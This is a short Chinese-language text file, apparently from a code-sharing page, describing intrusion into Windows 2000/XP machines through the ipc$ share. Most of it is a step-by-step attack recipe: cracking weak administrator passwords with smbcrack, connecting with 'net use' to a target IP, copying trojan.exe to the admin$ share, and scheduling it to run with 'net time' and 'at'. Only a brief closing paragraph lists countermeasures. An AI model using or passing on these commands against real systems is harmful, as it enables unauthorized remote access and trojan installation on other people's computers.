?? ipc$共享入侵.txt
字號:
ipc$共享入侵
微軟在win2000,xp中設置的這個功能對個人用戶來說幾乎毫無用處。反而成了黑客入侵nt架構操作系統的一條便利通道。如果你的操作系統存在不安全的口令,那就更可怕了。一條典型的入侵流程如下:
(1)用任何辦法得到一個帳戶與口令(猜測,破解),網上流傳有一個叫做smbcrack的軟件就是利用ipc$來破解帳戶口令的。如果你的密碼位數不高,又很簡單,是很容易被破解的。根據我的個人經驗,相當多的人都將administrator的口令設為123,2003,或者干脆不設密碼。
(2)使用命令net use \\xxx.xxx.xxx.xxx\ipc$“密碼” /user:“用戶名”建立一個有一定權限的ipc$連接。用copy trojan.exe \\xxx.xxx.xxx.xxx\admin$ 將木馬程序的服務器端復制到系統目錄下。
(3)用net time \\xxx.xxx.xxx.xxx 命令查看對方操作系統的時間,然后用at \\202.xxx.xxx.xxx 12:00 trojan.exe 讓trojan.exe在指定時間運行。
這樣一來,你的電腦就完全被黑客控制了。
應對措施:禁用server服務, Task Scheduler服務,去掉網絡文件和打印機共享前的對勾(插入圖1),
當然,給自己的帳戶加上強壯的口令才是最關鍵的。
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -